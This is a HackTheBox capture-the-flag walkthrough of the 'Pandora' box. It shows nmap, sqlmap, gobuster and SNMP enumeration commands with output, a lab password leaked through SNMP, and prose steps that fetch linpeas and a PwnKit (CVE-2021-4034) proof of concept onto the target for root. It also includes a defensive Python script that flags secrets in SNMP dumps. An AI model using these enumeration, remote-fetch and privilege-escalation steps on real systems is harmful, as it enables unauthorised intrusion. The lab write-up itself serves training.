Pandora
An easy Linux box from HackTheBox: SNMP enumeration leaks credentials for initial access, then a local privilege escalation exploit (CVE-2021-4034, PwnKit in polkit's pkexec) gives root.
Recon
All-port nmap scan to start; make a coffee.
nmap -sV -sC -p- -oA nmap/pandora 10.10.11.136
Nmap scan report for 10.10.11.136
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Didn't find much, just SSH and a web server.
Navigating to the web server, we find a contact form and a mention of another app called Play.
To check whether the contact form is SQL injectable, save the request sent on form submission with Burp and feed it to sqlmap:
sqlmap -r contact.req
Unfortunately, none of the parameters are injectable.
Also tried to enumerate vhosts with gobuster:
gobuster vhost --follow-redirect -u http://panda.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -o ~/Documents/htb/pandora/gobuster/pandora.vhost
But didn't find anything. Absolutely stumped, so back to nmap.
Let's try enumerating UDP services:
sudo nmap -sU 10.10.11.136
We find an SNMP service (Simple Network Management Protocol) on UDP port 161, finally.
Now we can use snmpenum to enumerate whatever is going on with that port. "public" is the community string, and linux.txt is the config file that selects the OIDs to query (no need to write it yourself, it ships with snmpenum as linux.txt):
snmpenum 10.10.11.136 public linux.txt
The output leaks a username, daniel
sshd: daniel [priv]
sshd: daniel@pts/1
The output is long and badly formatted, so use snmpwalk to enumerate it more cleanly:
snmpwalk -c public -v2c -On 10.10.11.136 > pandora.walk
It's a huge dump, so grep through it for likely credential material: high-entropy strings, login flags like "-u" and "-p", ssh commands, etc. That turns up daniel's password in the running-process argument list (hrSWRunParameters):
.1.3.6.1.2.1.25.4.2.1.5.1118 = STRING: "-u daniel -p HotelBabylon23"
.1.3.6.1.2.1.25.4.2.1.5.19258 = STRING: "-k start"
.1.3.6.1.2.1.25.4.2.1.5.19283 = STRING: "-u daniel -p HotelBabylon23"
which we can use to ssh in.
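As a defensive aside (an added example, not part of the original writeup): the leak above comes from hrSWRunParameters (OID .1.3.6.1.2.1.25.4.2.1.5, the command-line arguments of every running process), which SNMP hands to anyone holding the read community string. This Python script parses an `snmpwalk -On` dump and flags process rows whose arguments look like secrets, so an admin can audit their own hosts before someone else does; the sample walk lines, account names and patterns are constructed.

```python
import re

# hrSWRunParameters (HOST-RESOURCES-MIB): argv of each running process,
# indexed by PID. Readable with just the read community string.
HR_SW_RUN_PARAMETERS = ".1.3.6.1.2.1.25.4.2.1.5."

# Argument shapes that commonly carry a secret on the command line.
SECRET_PATTERNS = [
    re.compile(r"(?:^|\s)-p\s+\S+"),                      # "-u user -p <pass>" style
    re.compile(r"(?:^|\s)--password[=\s]\S+", re.I),      # --password=<pass>
    re.compile(r"\b(?:pass(?:word)?|pwd|secret|token)=\S+", re.I),
]

# One row of `snmpwalk -On` output: <oid> = STRING: "<value>"
WALK_LINE = re.compile(r'^(?P<oid>\.[\d.]+) = STRING: "(?P<value>.*)"$')


def parse_walk(text):
    """Yield (oid, value) for every STRING row in an snmpwalk -On dump."""
    for line in text.splitlines():
        m = WALK_LINE.match(line.strip())
        if m:
            yield m.group("oid"), m.group("value")


def find_leaked_credentials(text):
    """Return [(pid, cmdline)] for hrSWRunParameters rows that look like secrets."""
    hits = []
    for oid, value in parse_walk(text):
        if not oid.startswith(HR_SW_RUN_PARAMETERS):
            continue                      # other tables (sysName etc.) are not argv
        pid = int(oid[len(HR_SW_RUN_PARAMETERS):])
        if any(p.search(value) for p in SECRET_PATTERNS):
            hits.append((pid, value))
    return hits


# Constructed sample; not real output from the box.
SAMPLE_WALK = """\
.1.3.6.1.2.1.25.4.2.1.5.1118 = STRING: "-u backup_svc -p ExamplePass123"
.1.3.6.1.2.1.25.4.2.1.5.19258 = STRING: "-k start"
.1.3.6.1.2.1.25.4.2.1.5.20001 = STRING: "--password=s3cret --host db01"
.1.3.6.1.2.1.1.5.0 = STRING: "pandora"
"""

if __name__ == "__main__":
    for pid, cmdline in find_leaked_credentials(SAMPLE_WALK):
        print(f"pid {pid}: {cmdline}")
```

Run it against a real dump with `find_leaked_credentials(open("pandora.walk").read())`; every hit is a process whose secret should move to a config file or environment variable, and the community string itself should not be "public".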
Exploitation
After ssh'ing in with those creds, serve linpeas.sh from the attack host with a Python web server, fetch it into /tmp on the target, and run it.
The box is vulnerable to CVE-2021-4034 (PwnKit, a local privilege escalation in polkit's pkexec).
Clone a PoC onto the attack host, then wget the files onto the target and run it to get root.